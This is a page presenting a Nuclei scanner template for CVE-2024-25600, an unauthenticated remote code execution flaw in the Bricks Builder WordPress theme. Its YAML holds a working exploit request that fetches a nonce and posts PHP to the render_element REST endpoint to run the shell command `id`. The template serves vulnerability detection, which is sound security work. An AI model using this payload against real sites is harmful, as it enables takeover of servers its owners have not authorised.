Skip to content
Nuclei Templates

Unauthenticated Remote Code Execution – Bricks <= 1.9.6

ID: CVE-2024-25600

Severity: critical

Author: christbowel

Tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce

Description

Section titled “Description”

Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities

YAML Source

Section titled “YAML Source”
id: CVE-2024-25600


info:
  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
  author: christbowel
  severity: critical
  description: |
    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
    - https://github.com/Chocapikk/CVE-2024-25600
    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/themes/bricks/"
  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /wp-json/bricks/v1/render_element HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {
          "postId": "1",
          "nonce": "{{nonce}}",
          "element": {
            "name": "container",
            "settings": {
              "hasLoop": "true",
              "query": {
                "useQueryEditor": true,
                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
                "objectType": "post"
              }
            }
          }
        }
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Exception:"
          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
        condition: and


    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'nonce":"([0-9a-z]+)'
        internal: true
# digest: 4a0a00473045022100f512e02532b6a2bb30b6d8bcc544993c0b3d144cdd9a6fba2bf488f4866a704902203c6bd7c898bbe5a920696119615b4ed2d79523070583883e1feae8fc0dd590e2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-25600.yaml"

View on Github